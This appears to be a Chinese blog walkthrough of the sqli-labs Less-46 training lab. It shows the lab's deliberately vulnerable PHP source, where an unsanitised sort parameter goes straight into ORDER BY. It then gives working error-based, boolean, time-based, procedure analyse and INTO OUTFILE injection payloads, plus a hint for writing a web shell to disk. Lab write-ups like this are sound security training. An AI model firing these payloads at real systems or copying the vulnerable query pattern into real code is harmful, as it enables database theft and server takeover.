sqli-Labs————less-46(order by 之后的注入)

最新推荐文章于 2024-07-28 08:51:59 发布
最新推荐文章于 2024-07-28 08:51:59 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: 【渗透测试实战】 # Sqli-labs实战

前言

从这一关开始将会介绍一下order by相关的注入内容。

Less-46


源代码:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ORDER BY-Error-Numeric</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">

<?php
include("../sql-connections/sql-connect.php");
$id=$_GET['sort'];	
if(isset($id))
	{
	//logging the connection parameters to a file for analysis.
	$fp=fopen('result.txt','a');
	fwrite($fp,'SORT:'.$id."\n");
	fclose($fp);

	$sql = "SELECT * FROM users ORDER BY $id";
	$result = mysql_query($sql);
	if ($result)
		{
		?>
		<center>
		<font color= "#00FF00" size="4">
		
		<table   border=1'>
		<tr>
			<th> ID </th>
			<th> USERNAME   </th>
			<th> PASSWORD   </th>
		</tr>
		</font>
		</font>
		<?php
		while ($row = mysql_fetch_assoc($result))
			{
			echo '<font color= "#00FF11" size="3">';		
			echo "<tr>";
    			echo "<td>".$row['id']."</td>";
    			echo "<td>".$row['username']."</td>";
    			echo "<td>".$row['password']."</td>";
			echo "</tr>";
			echo "</font>";
			}	
		echo "</table>";
		
		}
		else
		{
		echo '<font color= "#FFFF00">';
		print_r(mysql_error());
		echo "</font>";  
		}
	}	
	else
	{
		echo "Please input parameter as SORT with numeric value<br><br><br><br>";
		echo "<br><br><br>";
		echo '<img src="../images/Less-46.jpg" /><br>';
		echo "Lesson Concept and code Idea by <b>D4rk</b>";
	}
?>
		
		
</font> </div></br></br></br>

</center> 
</body>
</html>

执行的sql语句为:

$sql = "SELECT * FROM users ORDER BY $id";

通过尝试?sort=1 desc 或者asc。显示的结果不同,所以可以注入!

从上述的sql语句中我们可以看出,我们的注入点在order by后面的参数中,而order by不同于我们在where后的注入点,不能使用union等进行注入。如何进行order by的注入,我们先来了解一下mysql官方select的文档。


我们利用order by后面的一些参数进行注入:

首先

(1)order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句,让该语句执行结果为一个数,我们尝试

http://192.168.11.136/sqli-labs/Less-46?sort=right(version(),1)

没有报错,right换成left都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入。

此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式,

①直接添加注入语句,?sort=(select ******)

②利用一些函数。例如rand()函数等。?sort=rand(sql语句)

Ps:此处我们可以展示一下rand(ture)和rand(false)的结果是不一样的。


③利用and,例如?sort=1 and (加sql语句)。

同时,sql语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。

报错注入:

http://192.168.11.136/sqli-labs/Less-46?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))


上述例子,可以看到root@localhost的用户名

接下来我们用rand()进行演示一下,因为上面提到rand(true)和 rand(false)结果是不一样的。

http://192.168.11.136/sqli-labs/Less-46?sort=rand(ascii(left(database(),1))=115)

http://192.168.11.136/sqli-labs/Less-46?sort=rand(ascii(left(database(),1))=116)


从上述两个图的结果,对比rand(ture)和rand(false)的结果,可以看出报错注入是成功的。

延时注入

http://192.168.11.136/sqli-labs/Less-46?sort=(SELECT  IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)

http://192.168.11.136/sqli-labs/Less-46?sort=1 and If(ascii(substr(database(),1,1))=116,0,sleep(5))


同时也可以用?sort=1 and 后添加注入语句。这里就不一一演示了。

1、procedure analyse参数后注入
 利用procedure analyse参数,我们可以执行报错注入。同时,在procedure analyse和order by之间可以存在limit参数,我们在实际应用中,往往也可能会存在limit后的注入,可以利用procedure analyse进行注入
 以下为示范例 
http://192.168.11.136/sqli-labs/Less-46?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

2、导入导出文件 into  outfile函数

http://192.168.11.136/sqli-labs/Less-46?sort=1 into outfile 'C:\\phpstudy\\WWW\\sqli-labs\\Less-46\\test.php'



那这个时候我们可以考虑上传网马,利用lines terminated by。

Into outtfile c:\\wamp\\www\\sqllib\\test1.txt lines terminated by 0x(网马进行16进制转换)

FLy_鹏程万里
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
m0_54899775的博客
12-28 1147
sqli-labs Less-46、47、48、49(sqli-labs闯关指南 46、47、48、49)—order by 相关注入
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1389
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs (less-46)
kukudeshuo的博客
03-15 871
sqli-labs (less-46) 进入46关,这时候我们发现屏幕上的显示的不是再要我们属于ID了,而是要我们输入sort,我们输入sort=1试试 我们发现查询的结果是这样的,那为什么我们输入sort=1会输出这些东西呢,我们可以通过查看源代码看看 这里我们发现sql语句为select * from users order by $id;,在原先的语句上加入了order by语句,那到底order by语句是什么意思呢,前面的关卡我们使用了order by语句,但都是都是为了判断字段数,这里我们来
SQL注入学习——sqli-labs通关(1-16)
最新发布
2402_82963715的博客
07-28 1660
​​​​​​​。
#sqli-labs less46
qq_45106794的博客
10-31 704
#sqli-labs less46 ?sort=1 and (select count() from information_schema.tables group by concat((select concat(table_name)from information_schema.tables where table_schema='security'limit 0,1),floor(rand...
sqli-labs/Less-46
m0_71299382的博客
11-22 199
sqli-labs第四十六关
Sqli-labs Less46-53 order by 后的注入
kevinhanser
08-10 1243
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Oeder By 后的注入 注入原理 ?sort=1 desc ?sort=1 asc 显示结果不同,说明可以注入 desc是 descend 降序意思 asc 是 ascend 升序意思 可利用 order by 后的一些参数进行注入 2.1 order by 后的数字可以...
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1821
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第12关详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 698
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1679
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2351
sqli第三关简要步骤
sqli-labs(46)
weixin_30674525的博客
06-03 635
0X01首先我们先来看一下源码 发现查询语句变成了 order by 参数也变成了 sort 看看是什么样的 (1)首先看看本关sql语句 $sql = "SELECT * FROM users ORDER BY $id"; 在mysqlorder by 参数后可以加入升序和降序来改变排列顺序, 我们来看看mysql的帮助函数 0...
Sqli-labs之Less:46-49
m0_46315342的博客
06-04 298
                                          &nbs...
order by name 注入
aiquan9342的博客
10-02 222
order by name idid是一个注入点可以利用if语句进行注入 order by name ,if(1=1,1,select 1 from information_schema.tables) 如果为假则执行第二条语句,要么报错要么没有返回值。这属于盲注的一种。 转载于:https://www.cnblogs.com/xishaonian/p/7618376.html...
mysql 数值型注入_MySQL Order By 注入总结
weixin_30069113的博客
01-18 260
前言最近在做一些漏洞盒子后台项目的总结,在盒子众多众测项目中,注入类的漏洞占比一直较大。其中Order By注入型的漏洞也占挺大一部分比例,这类漏洞也是白帽子乐意提交的类型(奖金高、被过滤概览小)。今天给大家分享下一些关于Order By的有趣的经验。何为order by 注入本文讨论的内容指可控制的位置在order by子句后,如下order参数可控:select * from goods or...
order by注入,limit注入,宽字节注入
qq_31088019的博客
08-09 1308
order by注入,limit注入,宽字节注入
Less 46 (ORDER BY 后的注入)
老司机开代码的博客
08-04 264
文章目录1. 题目分析2. 注入过程2.1 利用rand()实现布尔盲注2.2 时间盲注2.3 双注入 1. 题目分析 先看一下源码中的SQL $id=$_GET['sort']; $sql = "SELECT * FROM users ORDER BY $id"; 需要注意的是,此处我们输入的参数应该是?sort=xxx,并且后台没有对这个参数进行过滤。 但是和以往不同的是,我们的注入位置不再是WHERE后面,而是在ORDER BY之后。 目前有2中注入思路: 利用rand()实现布尔盲注 时间盲注
order by 注入
硫酸超的博客
08-07 2594
order by 注入前言直接添加注入语句利用一些函数利用 andorderby stacked injection 前言 尝试?sort=1 desc 或者 asc,显示结果不同,则表明可以注入。(升序 or 降序排列) 从上述的 sql 语句中我们可以看出,我们的注入点在 order by 后面的参数中,而 order by 不同于的我们在 where 后的注入点,不能使用 union 等进行注入。 如果order by '1’显示的是默认排序 直接添加注入语句 ?sort=(select ******
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值